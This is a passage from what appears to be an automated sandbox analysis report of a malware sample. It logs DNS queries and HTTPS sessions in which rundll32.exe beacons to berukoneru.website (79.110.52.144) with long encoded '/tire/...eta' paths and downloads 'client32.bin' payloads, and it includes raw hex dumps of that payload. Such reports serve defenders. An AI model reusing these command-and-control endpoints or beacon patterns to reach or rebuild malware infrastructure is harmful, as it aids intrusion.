                            Dec 14, 2021 10:21:28.635057926 CET | 8.8.8.8 | 192.168.2.6 | 0x9cd0 | No error (0) | prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com |  | 18.219.227.107 | A (IP address) | IN (0x0001)
                            Dec 14, 2021 10:21:38.706058979 CET | 8.8.8.8 | 192.168.2.6 | 0x766e | No error (0) | berukoneru.website |  | 79.110.52.144 | A (IP address) | IN (0x0001)
                            Dec 14, 2021 10:21:38.955063105 CET | 8.8.8.8 | 192.168.2.6 | 0x1f47 | No error (0) | berukoneru.website |  | 79.110.52.144 | A (IP address) | IN (0x0001)
                            Dec 14, 2021 10:21:39.093746901 CET | 8.8.8.8 | 192.168.2.6 | 0x1098 | No error (0) | berukoneru.website |  | 79.110.52.144 | A (IP address) | IN (0x0001)
                            Dec 14, 2021 10:21:39.223566055 CET | 8.8.8.8 | 192.168.2.6 | 0x3ff7 | No error (0) | berukoneru.website |  | 79.110.52.144 | A (IP address) | IN (0x0001)
                            Dec 14, 2021 10:21:39.320144892 CET | 8.8.8.8 | 192.168.2.6 | 0x48be | No error (0) | berukoneru.website |  | 79.110.52.144 | A (IP address) | IN (0x0001)
                            Dec 14, 2021 10:21:39.399878979 CET | 8.8.8.8 | 192.168.2.6 | 0xc3c5 | No error (0) | berukoneru.website |  | 79.110.52.144 | A (IP address) | IN (0x0001)
                            Dec 14, 2021 10:21:39.629395008 CET | 8.8.8.8 | 192.168.2.6 | 0xdf42 | No error (0) | berukoneru.website |  | 79.110.52.144 | A (IP address) | IN (0x0001)
                            Dec 14, 2021 10:21:39.748024940 CET | 8.8.8.8 | 192.168.2.6 | 0xbf7b | No error (0) | berukoneru.website |  | 79.110.52.144 | A (IP address) | IN (0x0001)
                            Dec 14, 2021 10:21:39.923528910 CET | 8.8.8.8 | 192.168.2.6 | 0xd2f2 | No error (0) | berukoneru.website |  | 79.110.52.144 | A (IP address) | IN (0x0001)
                            Dec 14, 2021 10:21:40.035238981 CET | 8.8.8.8 | 192.168.2.6 | 0xbbba | No error (0) | berukoneru.website |  | 79.110.52.144 | A (IP address) | IN (0x0001)
                            Dec 14, 2021 10:21:40.508769035 CET | 8.8.8.8 | 192.168.2.6 | 0x1433 | No error (0) | berukoneru.website |  | 79.110.52.144 | A (IP address) | IN (0x0001)
                            Dec 14, 2021 10:21:40.791791916 CET | 8.8.8.8 | 192.168.2.6 | 0xe94f | No error (0) | berukoneru.website |  | 79.110.52.144 | A (IP address) | IN (0x0001)
                            Dec 14, 2021 10:22:41.773610115 CET | 8.8.8.8 | 192.168.2.6 | 0x1 | No error (0) | 8.8.8.8.in-addr.arpa |  |  | PTR (Pointer record) | IN (0x0001)
                            Dec 14, 2021 10:22:41.797523975 CET | 8.8.8.8 | 192.168.2.6 | 0x2 | Name error (3) | 1.0.0.127.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001)

                            HTTP Request Dependency Graph

                            • berukoneru.website

                            HTTPS Proxied Packets

                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            0 | 192.168.2.6 | 49812 | 79.110.52.144 | 443 | C:\Windows\SysWOW64\rundll32.exe
                            Timestamp | kBytes transferred | Direction | Data
                            2021-12-14 09:21:38 UTC | 0 | OUT | GET /tire/jd_2FYT4kZR8w841QcBB1/tR81NFI9aRqohSRO/X0dydnORWplT5uR/5w00AG_2B_2FJ09dQQ/WUxRePiB4/GTOJFQ8FP8igXEjbgkH9/zEak3366_2FSVu5YatC/6c8yBLY3VgDZriaVuWUlRJ/NfUpYHR7DlV_2/FmC6rrvj/IWZqq_2FXZYrZ6Jfrjl4wOK/cOGNowVtID/CNlyDmEUAcdL6Nggn/Q6FP_2FvO/_2BU9JHdR/p.eta HTTP/1.1
                            Cache-Control: no-cache
                            Connection: Keep-Alive
                            Pragma: no-cache
                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                            Host: berukoneru.website
                            2021-12-14 09:21:38 UTC | 0 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.20.1
                            Date: Tue, 14 Dec 2021 09:21:38 GMT
                            Content-Type: application/zip
                            Content-Length: 213639
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Set-Cookie: PHPSESSID=7dqmvvfrme1greav2ihm5lh9u3; path=/; domain=.berukoneru.website
                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                            Cache-Control: public
                            Pragma: no-cache
                            Set-Cookie: lang=en; expires=Thu, 13-Jan-2022 09:21:38 GMT; path=/
                            Content-Transfer-Encoding: Binary
                            Content-Disposition: attachment; filename=client32.bin
                            2021-12-14 09:21:38 UTC176INData Raw: 0e 82 3b 28 5c 8a 23 f3 fe ac ea 89 97 4f fd 45 07 36 35 55 85 5f e4 c1 68 4d fa b0 54 a3 22 04 98 4f c7 b5 8d 23 7d b2 61 b6 31 34 20 b7 1b a4 d9 42 0b 7e 84 3a ce e7 2c 38 36 17 77 e7 e4 fc 2c 65 16 40 a0 54 34 a1 13 8a 38 48 80 ff 35 49 57 af 87 44 9a 1f fc e5 4c 13 ed 3a 2b e0 e7 ce 29 ed f9 71 81 2e b2 3f 69 f0 38 cd 38 b1 59 2a 92 fb 5c 83 29 11 0a e0 7b 1c 3f d2 c4 55 e4 71 e3 3c b5 7d 97 37 f4 89 35 3e 2a 90 9a 16 31 29 0e b4 2a 40 26 4c aa 45 d5 c7 d8 27 6a 16 b1 9a 67 61 41 a1 1a ba 9f 70 6e 9e e9 48 f7 c2 cc 52 c9 00 75 56 16 a2 d2 83 54 8f f5 d3 27 87 8d e6 67 d7 b0 37 8c b1 38 87 6b 58 e8 12 fe ec 00 2d fd 70 73 31 4e 6a 42 32 85 39 f6 e8 5b 9a 34 07 d7 bd 73 ea cc e2 da f0 8c 8d 5c ca 99 14 9d fd ba a1 e0 ed 4d 03 be 96 69 17 e0 56 c7 1f 7f
                            Data Ascii: ;(\#OE65U_hMT"O#}a14 B~:,86w,e@T48H5IWDL:+)q.?i88Y*\){?Uq<}75>*1)*@&LE'jgaApnHRuVT'g78kX-ps1NjB29[4s\MiV
                            2021-12-14 09:21:38 UTC192INData Raw: a0 19 9a db e6 23 d3 03 86 6f 75 af 47 d5 3f 20 85 14 19 0e b9 d4 63 8c fd 8a 9a af a9 f6 65 42 84 ce cc f3 73 04 88 70 20 03 2e 2d 3a f5 0f cf 45 fe 85 b5 60 0f 38 e4 0f 37 bc bf 4d f6 2c 45 a8 31 d4 65 37 db a7 ee c6 e6 95 0e bc 4a 8a 34 9d a4 0d 59 51 52 14 5c c1 0f 3c ec 47 b1 68 4c 80 4c 71 0c 20 bb b6 5b 7b d7 49 8d 03 7d d5 bb ae cc 8b d0 d0 02 e9 5a 65 53 ae 1e 2c a6 43 6e e2 1e c5 78 ff 67 8f f0 0d d1 d9 1e 13 2c a2 1d df 57 0b e7 72 4f c1 4e fd ee 99 04 21 c1 02 12 96 53 77 8d aa 83 93 27 ff a3 34 86 54 2e 18 ab 65 1d 56 65 e7 f0 fa 9f 11 fb 79 79 cc 44 ad 4a 13 67 7c 78 91 1b 35 3c f6 1d 35 63 f5 35 af 82 78 1c 11 a5 0d 76 24 5c 35 8e 9a 62 ca eb d1 dc 7d 1a a1 82 c4 f1 29 ea 1f 1c 46 3e 42 d1 69 f2 f0 01 dd e9 6b 1b 07 ff 17 68 ac d1 b5 48 8c
                            Data Ascii: #ouG? ceBsp .-:E`87M,E1e7J4YQR\<GhLLq [{I}ZeS,Cnxg,WrON!Sw'4T.eVeyyDJg|x5<5c5xv$\5b})F>BikhH
                            2021-12-14 09:21:38 UTC208INData Raw: 15 93 b0 c9 e5 45 68 a6 ac b4 73 14 04 8b d2 73 37 da 94 58 af 8c 71 a1 da 98 2f 7a 5f 00 68 57 45 4d 6b 23 a3 df ac b7 08 22 c0 21 92 9d 91 8b 92 62 0b c1 a4 d9 31 21 b2 82 fc 16 c3 c2 2c e6 f2 c9 7b 9e ed 62 e8 b1 c5 94 41 f1 99 7a db 30 24 96 ba 10 ac d7 87 21 08 bd c6 d3 02 47 9e 4d 19 3c 56 18 b8 86 af af 82 b6 d8 04 fc 7b 26 3f 88 0f 78 4b de 4d cd 3d 2d 67 48 53 e0 e8 f4 57 ba fb ab 11 65 6b 3f 5a 74 66 d8 6f cd a5 55 54 84 d7 84 2a 96 f0 7b ba fb 3a 40 ae 9a 7e 21 6d 09 fa 90 30 cc af f9 65 a6 50 8e 9b d2 63 fb a0 1f ac 48 d8 90 99 cc 91 db b9 d3 5a f0 df 5d f6 67 0a fc a1 83 ac 70 74 61 2d 1d 54 6f de e8 e2 75 10 9c ed a3 3d b9 89 38 fd 44 93 dc bb be 2a ee 11 5f 06 2e 3b 9d 7d 2a 31 15 93 0e c2 16 3f a1 08 92 6c 38 1e dc 9a b9 14 3b 62 e8 ab b8
                            Data Ascii: Ehss7Xq/z_hWEMk#"!b1!,{bAz0$!GM<V{&?xKM=-gHSWek?ZtfoUT*{:@~!m0ePcHZ]gpta-Tou=8D*_.;}*1?l8;b


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            1 | 192.168.2.6 | 49813 | 79.110.52.144 | 443 | C:\Windows\SysWOW64\rundll32.exe
                            Timestamp | kBytes transferred | Direction | Data
                            2021-12-14 09:21:39 UTC | 209 | OUT | GET /tire/yIaXbfYof9IP/8B_2BPJ4_2B/hMnTiYTFHmvWMq/Om0JbLkmD_2F5koSu_2FY/nLk_2FKibFUJ9gOk/MZT8jf1B5RdC0UZ/6Z4No8ixNFmBVmH7Bj/uDf3BhOPM/DLBe_2Bd6mkqoP7YTIID/XBuFTJLHbx1D4QjnBWn/TnGiYGHPz2eGN6knS8Er2o/_2B5QVwmx2J_2/BE8gCb3N/ingbPXC9ZN_2BMhH2cvWH8p/CYnerQtz/Ddd.eta HTTP/1.1
                            Cache-Control: no-cache
                            Connection: Keep-Alive
                            Pragma: no-cache
                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                            Host: berukoneru.website
                            2021-12-14 09:21:39 UTC | 209 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.20.1
                            Date: Tue, 14 Dec 2021 09:21:39 GMT
                            Content-Type: application/zip
                            Content-Length: 213639
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Set-Cookie: PHPSESSID=to2kun6u6g028rf2mb4cgnplm5; path=/; domain=.berukoneru.website
                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                            Cache-Control: public
                            Pragma: no-cache
                            Set-Cookie: lang=en; expires=Thu, 13-Jan-2022 09:21:39 GMT; path=/
                            Content-Transfer-Encoding: Binary
                            Content-Disposition: attachment; filename=client32.bin


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            10 | 192.168.2.6 | 49823 | 79.110.52.144 | 443 | C:\Windows\SysWOW64\rundll32.exe
                            Timestamp | kBytes transferred | Direction | Data
                            2021-12-14 09:21:40 UTC | 1895 | OUT | GET /tire/KjB2BgkWWh/2R_2Fkj8GC7yaP1kC/DPb_2B003_2B/KSHrvwTkEkd/_2FAMHiah0zctf/nNbEHjkCSlyuZxandMk7W/125Nt4kKNIyzhV_2/FpQlU2nlzM_2FEI/PEryRBP68LWoGHV3sm/y9L4VUWvc/E0UlFXDmQ0_2F2mVHcN_/2B13NnOs91EWboOkL1Q/soeab74L05htIewL3_2FTu/VD2Jph.eta HTTP/1.1
                            Cache-Control: no-cache
                            Connection: Keep-Alive
                            Pragma: no-cache
                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                            Host: berukoneru.website
                            2021-12-14 09:21:40 UTC | 1896 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.20.1
                            Date: Tue, 14 Dec 2021 09:21:40 GMT
                            Content-Type: application/zip
                            Content-Length: 1869
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Set-Cookie: PHPSESSID=v9r8vnipl3dhaoaej59v015p80; path=/; domain=.berukoneru.website
                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                            Cache-Control: public
                            Pragma: no-cache
                            Set-Cookie: lang=en; expires=Thu, 13-Jan-2022 09:21:40 GMT; path=/
                            Content-Transfer-Encoding: Binary
                            Content-Disposition: attachment; filename=client32.bin


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            11 | 192.168.2.6 | 49825 | 79.110.52.144 | 443 | C:\Windows\SysWOW64\rundll32.exe
                            Timestamp | kBytes transferred | Direction | Data
                            2021-12-14 09:21:40 UTC | 1898 | OUT | GET /tire/m4jBg57LO/F3omyPFCoq2BsJvvqQjq/M_2Frtvqdkes1JW5OTL/BNOx14m03YJ94TjlPw0PZA/GLczTuNVmCYMu/71GtDP5r/ukrg4HqiGfIkYNEYalZxMet/SDWbFyptRt/KM_2FafHnmbZCQsUs/pLVEK0s2DOMd/NxrlfGMBoYt/93NMnwEIHPr7kq/Wl1k8ZjV32EJB93_2FhHV/Qjw6VJUmVv/3MpXPnj1D/cD.eta HTTP/1.1
                            Cache-Control: no-cache
                            Connection: Keep-Alive
                            Pragma: no-cache
                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                            Host: berukoneru.website
                            2021-12-14 09:21:40 UTC | 1898 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.20.1
                            Date: Tue, 14 Dec 2021 09:21:40 GMT
                            Content-Type: application/zip
                            Content-Length: 1869
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Set-Cookie: PHPSESSID=556vhnkqkn9iuh6ietolk9e630; path=/; domain=.berukoneru.website
                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                            Cache-Control: public
                            Pragma: no-cache
                            Set-Cookie: lang=en; expires=Thu, 13-Jan-2022 09:21:40 GMT; path=/
                            Content-Transfer-Encoding: Binary
                            Content-Disposition: attachment; filename=client32.bin


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            2 | 192.168.2.6 | 49814 | 79.110.52.144 | 443 | C:\Windows\SysWOW64\rundll32.exe
                            Timestamp | kBytes transferred | Direction | Data
                            2021-12-14 09:21:39 UTC | 289 | OUT | GET /tire/aZ8BheahozwZJezagn3wPqr/iz35YcAb_2/F5jeyfvVg2ICfCrEk/0rrw6u3U7gic/uqJTyp4A5eQ/0U2GqSt0iiLbUx/HO3viOhQ8WkG8vbfTOB_2/BnaqEkGKFXXYKGIR/Ctbh99dX8lvtuYg/YlazQ5uDO_2FKEL9Q_/2BJjb_2Fo/n4TKwNU4Z7gGvATNQb4t/rYS_2FADS/RnX9qstM/g.eta HTTP/1.1
                            Cache-Control: no-cache
                            Connection: Keep-Alive
                            Pragma: no-cache
                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                            Host: berukoneru.website
                            2021-12-14 09:21:39 UTC | 419 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.20.1
                            Date: Tue, 14 Dec 2021 09:21:39 GMT
                            Content-Type: application/zip
                            Content-Length: 213639
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Set-Cookie: PHPSESSID=50rkccuo2l6o33r9sc7cq0jui3; path=/; domain=.berukoneru.website
                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                            Cache-Control: public
                            Pragma: no-cache
                            Set-Cookie: lang=en; expires=Thu, 13-Jan-2022 09:21:39 GMT; path=/
                            Content-Transfer-Encoding: Binary
                            Content-Disposition: attachment; filename=client32.bin
                            2021-12-14 09:21:39 UTC531INData Raw: 36 0c 6a 47 30 19 9c 4e 22 85 cb 33 b8 3c 86 72 6e eb c2 7f 61 f3 63 c9 32 ed 9a 6c 4e 71 21 a3 96 09 5b 1b f6 91 d8 af 7f 12 2f 29 bb 70 ab 1e 8f 4e 86 79 ad f6 43 a3 93 18 7d 1f cd c9 74 b0 36 46 e2 59 f2 66 4d 73 8d 51 79 81 72 ed e3 8b 3b 3c f9 23 bf 04 38 63 7f ed 81 2c 3c 66 e8 4d 85 47 dd da 40 0d f8 54 73 09 8e e5 8d 8d 56 86 3b 42 a5 20 c3 4d 3d 63 e6 81 2e d5 06 d0 40 d4 9b 0d 1b 77 b1 b5 59 66 f4 f3 d3 f0 a4 6a 03 8b d6 85 61 23 74 bb b4 54 a1 fa 5a 96 88 0d 48 0c 10 fc a7 55 bb fe 20 0d e3 f2 af 1a c5 61 fe 3f d1 72 04 af a2 d5 4c 24 76 71 d3 2c 1d 01 cc 92 44 5b b1 61 ea 2f e9 d5 61 5a c7 1d 6f 06 ad 68 4f d1 aa c8 64 89 7c 2f a9 56 0d 9e 5a 98 51 aa 2c 0b 5d 83 9b 9f 16 c2 e5 71 51 02 ea cc 84 39 90 e7 3b ce f7 eb ee e7 16 20 5a 10 d9 b7 22
                            Data Ascii: 6jG0N"3<rnac2lNq![/)pNyC}t6FYfMsQyr;<#8c,<fMG@TsV;B M=c.@wYfja#tTZHU a?rL$vq,D[a/aZohOd|/VZQ,]qQ9; Z"
                            2021-12-14 09:21:39 UTC547INData Raw: f2 e5 3a cd 32 2d ed 92 9d 3f 9d f5 64 8d 06 c5 e4 93 7f 3e 78 36 95 1c 30 12 88 9a 97 7e 9b 10 03 a4 d9 d5 b1 65 9e 77 c5 87 e2 43 68 be db 1f 8e 2e a5 55 62 3c ec df 5b 5e a5 61 b7 69 0c ae ee 83 66 7a f5 00 74 70 c2 44 a6 a0 92 0c 66 fa b1 20 92 77 bf 47 29 d0 51 4a 32 10 65 09 54 81 4f ca 93 25 3b c8 e6 6b f3 3d 7d 97 d1 00 ae 70 9d 06 59 3e 67 79 35 74 ea a1 ac 3c 5d 64 44 b3 02 ea 1a ec 16 0e 15 85 65 8c 11 2a 09 43 5a ad 8a 26 10 f6 44 b8 5c 39 ac e8 dc 38 55 3d 16 98 7a 7d 69 fb c6 57 64 49 89 04 01 eb bc 13 9b d2 51 58 5b b1 c4 77 7c 6c b9 4d 8e af 08 97 af 13 96 8a 13 dc 5b 85 ee 1d d9 f1 cb 2e 8d 50 2f 90 1a 74 47 9d 82 de ef bb d5 4b 2a 1c 36 7f f6 20 e8 e6 00 2f 63 53 d2 32 c8 6f 20 15 e4 5b ee d7 c5 b4 29 0f ad c9 4a db d2 7e b9 b1 d9 bf 4a
                            Data Ascii: :2-?d>x60~ewCh.Ub<[^aifztpDf wG)QJ2eTO%;k=}pY>gy5t<]dDe*CZ&D\98U=z}iWdIQX[w|lM[.P/tGK*6 /cS2o [)J~J
                            2021-12-14 09:21:39 UTC563INData Raw: 20 73 2e 57 0e da 3c 5f 79 54 cf f8 d9 3a ac c6 dd 9b d7 a4 39 61 8d 95 a4 49 72 7c 27 f5 8b 31 15 bb b1 a4 98 cd 3b 78 40 00 11 29 d8 f3 40 3f e5 24 c7 d0 44 db 15 b8 d0 20 72 e0 9d 97 4a eb ec 4c 78 60 b4 20 69 c7 26 d6 35 1e de 8d c2 21 c5 97 6d 4b a5 c3 49 16 5b d8 a6 e0 0f f2 84 9c d1 79 c0 82 53 97 59 e0 08 c2 cf 30 12 b5 5c 01 b9 dd c2 ee c3 36 24 f8 c7 cb e1 8a c7 fc 03 78 4b 1d ee 0a 44 0a 49 e0 cf 70 92 83 7c e4 ea 46 eb b2 dd eb 84 d1 99 14 0d de f8 64 26 f1 4b 89 99 b9 8e 38 6f 50 7d c3 4d a3 5a 10 f5 76 a0 20 0d 92 21 d1 72 f9 e7 a4 63 ff d0 b6 6b 3d b8 b2 cb 9f 53 83 29 ca db b3 aa f0 99 4c c0 77 df 06 d3 91 a4 f3 f3 97 a2 4b d3 ef 25 5c 44 cb 53 4b 0c 61 51 72 38 97 7d aa 8f 25 bb 4f 4d e7 f3 1b 93 67 be 35 a7 6d 10 26 d0 e9 75 49 03 9b fe
                            Data Ascii: s.W<_yT:9aIr|'1;x@)@?$D rJLx` i&5!mKI[ySY0\6$xKDIp|Fd&K8oP}MZv !rck=S)LwK%\DSKaQr8}%OMg5m&uI
                            2021-12-14 09:21:39 UTC579INData Raw: 36 19 cd 54 79 36 2b 6b 10 11 75 b0 3e 40 37 97 94 7d b3 d1 b3 ee 09 71 72 a8 16 9f 4c 06 27 52 09 90 a7 65 25 a4 a4 57 68 42 27 dd 6a 76 21 5f b3 5f 82 fe 88 df 67 74 1f 96 b4 23 a0 83 08 c2 ae 2d 1b fc ae e5 20 42 94 8a d8 7b d9 9b cf c3 7d 90 4b c0 21 97 33 34 d0 18 df fd d8 62 17 9d 9f 04 23 01 17 72 ad d8 e3 c8 36 ab ab 9c 6d a6 22 8a 34 fe 50 67 53 c5 95 c5 00 5e 38 04 78 1c ea fa f3 22 1e 4b 90 85 1f bb 19 f3 e4 1a 2e 5a d5 ee 09 ea 8a 92 12 37 4d 76 8c 5e 86 9a f6 0f 83 42 3d 9c 00 f1 3f 0a b2 7c 5a 8b 07 84 14 3c ee 7d ba 94 3d 04 25 74 dd 76 52 55 08 a3 7a 93 c7 7a 1d ab 8d 97 0e 87 eb b0 78 a9 b1 ef 0f 66 80 8a a6 12 cd 21 8a d8 66 2c bb 2d 78 c2 f3 b8 a0 53 6a 08 0a 6f d7 94 8a 1c 08 1b f7 0c 22 8d 33 21 1c 41 72 82 67 54 6c 50 cb 57 a0 17 74
                            Data Ascii: 6Ty6+ku>@7}qrL'Re%WhB'jv!__gt#- B{}K!34b#r6m"4PgS^8x"K.Z7Mv^B=?|Z<}=%tvRUzzxf!f,-xSjo"3!ArgTlPWt
                            2021-12-14 09:21:39 UTC595INData Raw: 0e 82 3b 28 5c 8a 23 f3 fe ac ea 89 97 4f fd 45 07 36 35 55 85 5f e4 c1 68 4d fa b0 54 a3 22 04 98 4f c7 b5 8d 23 7d b2 61 b6 31 34 20 b7 1b a4 d9 42 0b 7e 84 3a ce e7 2c 38 36 17 77 e7 e4 fc 2c 65 16 40 a0 54 34 a1 13 8a 38 48 80 ff 35 49 57 af 87 44 9a 1f fc e5 4c 13 ed 3a 2b e0 e7 ce 29 ed f9 71 81 2e b2 3f 69 f0 38 cd 38 b1 59 2a 92 fb 5c 83 29 11 0a e0 7b 1c 3f d2 c4 55 e4 71 e3 3c b5 7d 97 37 f4 89 35 3e 2a 90 9a 16 31 29 0e b4 2a 40 26 4c aa 45 d5 c7 d8 27 6a 16 b1 9a 67 61 41 a1 1a ba 9f 70 6e 9e e9 48 f7 c2 cc 52 c9 00 75 56 16 a2 d2 83 54 8f f5 d3 27 87 8d e6 67 d7 b0 37 8c b1 38 87 6b 58 e8 12 fe ec 00 2d fd 70 73 31 4e 6a 42 32 85 39 f6 e8 5b 9a 34 07 d7 bd 73 ea cc e2 da f0 8c 8d 5c ca 99 14 9d fd ba a1 e0 ed 4d 03 be 96 69 17 e0 56 c7 1f 7f
                            Data Ascii: ;(\#OE65U_hMT"O#}a14 B~:,86w,e@T48H5IWDL:+)q.?i88Y*\){?Uq<}75>*1)*@&LE'jgaApnHRuVT'g78kX-ps1NjB29[4s\MiV
                            2021-12-14 09:21:39 UTC611INData Raw: a0 19 9a db e6 23 d3 03 86 6f 75 af 47 d5 3f 20 85 14 19 0e b9 d4 63 8c fd 8a 9a af a9 f6 65 42 84 ce cc f3 73 04 88 70 20 03 2e 2d 3a f5 0f cf 45 fe 85 b5 60 0f 38 e4 0f 37 bc bf 4d f6 2c 45 a8 31 d4 65 37 db a7 ee c6 e6 95 0e bc 4a 8a 34 9d a4 0d 59 51 52 14 5c c1 0f 3c ec 47 b1 68 4c 80 4c 71 0c 20 bb b6 5b 7b d7 49 8d 03 7d d5 bb ae cc 8b d0 d0 02 e9 5a 65 53 ae 1e 2c a6 43 6e e2 1e c5 78 ff 67 8f f0 0d d1 d9 1e 13 2c a2 1d df 57 0b e7 72 4f c1 4e fd ee 99 04 21 c1 02 12 96 53 77 8d aa 83 93 27 ff a3 34 86 54 2e 18 ab 65 1d 56 65 e7 f0 fa 9f 11 fb 79 79 cc 44 ad 4a 13 67 7c 78 91 1b 35 3c f6 1d 35 63 f5 35 af 82 78 1c 11 a5 0d 76 24 5c 35 8e 9a 62 ca eb d1 dc 7d 1a a1 82 c4 f1 29 ea 1f 1c 46 3e 42 d1 69 f2 f0 01 dd e9 6b 1b 07 ff 17 68 ac d1 b5 48 8c
                            Data Ascii: #ouG? ceBsp .-:E`87M,E1e7J4YQR\<GhLLq [{I}ZeS,Cnxg,WrON!Sw'4T.eVeyyDJg|x5<5c5xv$\5b})F>BikhH
                            2021-12-14 09:21:39 UTC627INData Raw: 15 93 b0 c9 e5 45 68 a6 ac b4 73 14 04 8b d2 73 37 da 94 58 af 8c 71 a1 da 98 2f 7a 5f 00 68 57 45 4d 6b 23 a3 df ac b7 08 22 c0 21 92 9d 91 8b 92 62 0b c1 a4 d9 31 21 b2 82 fc 16 c3 c2 2c e6 f2 c9 7b 9e ed 62 e8 b1 c5 94 41 f1 99 7a db 30 24 96 ba 10 ac d7 87 21 08 bd c6 d3 02 47 9e 4d 19 3c 56 18 b8 86 af af 82 b6 d8 04 fc 7b 26 3f 88 0f 78 4b de 4d cd 3d 2d 67 48 53 e0 e8 f4 57 ba fb ab 11 65 6b 3f 5a 74 66 d8 6f cd a5 55 54 84 d7 84 2a 96 f0 7b ba fb 3a 40 ae 9a 7e 21 6d 09 fa 90 30 cc af f9 65 a6 50 8e 9b d2 63 fb a0 1f ac 48 d8 90 99 cc 91 db b9 d3 5a f0 df 5d f6 67 0a fc a1 83 ac 70 74 61 2d 1d 54 6f de e8 e2 75 10 9c ed a3 3d b9 89 38 fd 44 93 dc bb be 2a ee 11 5f 06 2e 3b 9d 7d 2a 31 15 93 0e c2 16 3f a1 08 92 6c 38 1e dc 9a b9 14 3b 62 e8 ab b8
                            Data Ascii: Ehss7Xq/z_hWEMk#"!b1!,{bAz0$!GM<V{&?xKM=-gHSWek?ZtfoUT*{:@~!m0ePcHZ]gpta-Tou=8D*_.;}*1?l8;b


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            3 | 192.168.2.6 | 49815 | 79.110.52.144 | 443 | C:\Windows\SysWOW64\rundll32.exe
                            Timestamp | kBytes transferred | Direction | Data
                            2021-12-14 09:21:39 UTC | 595 | OUT | GET /tire/qmvui3Jef80_2BIeM_2BXh/O_2By54KPinsD/_2BFfpah/5k89w5bXqU7DEWhQp1iBEy2/_2BnU_2FsR/sUo3C8aISdxyIYl8W/JynqV_2BmddH/AgiN2_2BUrO/VCPQbezXreMebQ/izeoYIW_2BTEh6B2Zh_2B/L3PgbMDpsuFq53n5/obVS_2BHmsXbkex/IxU7ONkaq6S5id4E4C/VTSP2pp87/7bclEnvP5UuFRz5_2FIN/q_2FKVUn/a3U.eta HTTP/1.1
                            Cache-Control: no-cache
                            Connection: Keep-Alive
                            Pragma: no-cache
                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                            Host: berukoneru.website
                            2021-12-14 09:21:39 UTC | 629 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.20.1
                            Date: Tue, 14 Dec 2021 09:21:39 GMT
                            Content-Type: application/zip
                            Content-Length: 268426
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Set-Cookie: PHPSESSID=56h97hrongb1tcobt3aqjld9k2; path=/; domain=.berukoneru.website
                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                            Cache-Control: public
                            Pragma: no-cache
                            Set-Cookie: lang=en; expires=Thu, 13-Jan-2022 09:21:39 GMT; path=/
                            Content-Transfer-Encoding: Binary
                            Content-Disposition: attachment; filename=client32.bin
                            2021-12-14 09:21:39 UTC629INData Raw: 58 1b 91 63 b8 aa 05 14 26 b5 4a 87 75 c1 a0 26 9e 3c 11 6e 71 42 96 26 99 7a 08 52 54 2f 31 7f 58 90 87 ef 21 eb 4d ac aa 62 d0 f5 9e 65 dd b1 86 a9 14 c8 ae 98 d4 b6 d6 60 d1 47 77 cd be 8c 6e b1 66 d1 e8 7a 10 1e c8 8c 97 db c5 0f 0b 40 05 e7 84 c2 c8 34 df 33 e6 dc 52 e3 46 f4 95 b7 af 93 01 65 a9 71 60 bf 1f 51 95 4a f0 de 35 3e 05 cd 02 6e e9 85 80 bb d0 9e 8a 75 b1 3b 1e 78 47 1f 6b 12 e2 6d 4a 11 60 95 cc b0 70 f1 9e 77 55 2f 09 91 10 e8 d7 e3 05 c1 1d c9 ea 2f 96 3d 82 e8 0e ae b5 77 75 a5 0d bc 2f f1 b6 c5 47 94 e1 2d 77 eb d0 a1 8b a7 ad 18 90 fa 77 82 10 81 a4 59 32 4a 80 82 20 cd 7d 1d 20 6f 17 d7 8e 41 9a d0 fb 32 98 6c 3b da 81 8e 51 5e cb e0 92 a7 47 9a 9d c8 4d ed 20 99 cb 03 c1 2b 49 00 fa b7 08 c4 02 c1 94 c4 b3 eb 0b 87 5e bf 36 f0 75
                            Data Ascii: Xc&Ju&<nqB&zRT/1X!Mbe`Gwnfz@43RFeq`QJ5>nu;xGkmJ`pwU//=wu/G-wwY2J } oA2l;Q^GM +I^6u
